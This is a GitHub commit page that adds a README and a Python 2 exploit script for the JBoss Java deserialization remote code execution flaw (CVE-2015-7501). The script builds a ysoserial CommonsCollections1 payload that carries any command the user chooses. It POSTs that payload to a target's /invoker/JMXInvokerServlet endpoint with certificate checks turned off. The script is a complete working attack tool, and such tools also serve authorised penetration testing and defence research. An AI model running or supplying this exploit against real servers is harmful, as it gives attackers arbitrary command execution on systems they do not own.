Commit
This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
Added JBoss RCE exploit (CVE-2015-7501)
- Loading branch information
1 parent
c574129
commit 3390f2f
Showing
5 changed files
with
69 additions
and
1 deletion.
There are no files selected for viewing
File renamed without changes.
File renamed without changes.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,6 @@ | ||
# JBoss Java Deserialization RCE (CVE-2015-7501) | ||
|
||
Exploit for the JBoss Java Deserialization RCE (CVE-2015-7501) | ||
|
||
The python script uses [ysoserial](https://github.com/frohoff/ysoserial) to dynamically generate the payload. Therefore java is required as well. | ||
|
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,61 @@ | ||
#! /usr/bin/env python2 | ||
|
||
# Jboss Java Deserialization RCE (CVE-2015-7501) | ||
# Made with <3 by @byt3bl33d3r | ||
|
||
import requests | ||
from requests.packages.urllib3.exceptions import InsecureRequestWarning | ||
requests.packages.urllib3.disable_warnings(InsecureRequestWarning) | ||
|
||
import argparse | ||
import sys, os | ||
#from binascii import hexlify, unhexlify | ||
from subprocess import check_output | ||
|
||
ysoserial_default_paths = ['./ysoserial.jar', '../ysoserial.jar'] | ||
ysoserial_path = None | ||
|
||
parser = argparse.ArgumentParser() | ||
parser.add_argument('target', type=str, help='Target IP') | ||
parser.add_argument('command', type=str, help='Command to run on target') | ||
parser.add_argument('--proto', choices={'http', 'https'}, default='http', help='Send exploit over http or https (default: http)') | ||
parser.add_argument('--ysoserial-path', metavar='PATH', type=str, help='Path to ysoserial JAR (default: tries current and previous directory)') | ||
|
||
if len(sys.argv) < 2: | ||
parser.print_help() | ||
sys.exit(1) | ||
|
||
args = parser.parse_args() | ||
|
||
if not args.ysoserial_path: | ||
for path in ysoserial_default_paths: | ||
if os.path.exists(path): | ||
ysoserial_path = path | ||
else: | ||
if os.path.exists(args.ysoserial_path): | ||
ysoserial_path = args.ysoserial_path | ||
|
||
if ysoserial_path is None: | ||
print '[-] Could not find ysoserial JAR file' | ||
sys.exit(1) | ||
|
||
if len(args.target.split(":")) != 2: | ||
print '[-] Target must be in format IP:PORT' | ||
sys.exit(1) | ||
|
||
if not args.command: | ||
print '[-] You must specify a command to run' | ||
sys.exit(1) | ||
|
||
ip, port = args.target.split(':') | ||
|
||
print '[*] Target IP: {}'.format(ip) | ||
print '[*] Target PORT: {}'.format(port) | ||
|
||
gadget = check_output(['java', '-jar', ysoserial_path, 'CommonsCollections1', args.command]) | ||
|
||
r = requests.post('{}://{}:{}/invoker/JMXInvokerServlet'.format(args.proto, ip, port), verify=False, data=gadget) | ||
|
||
if r.status_code == 200: | ||
print '[+] Command executed successfully' | ||
|
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters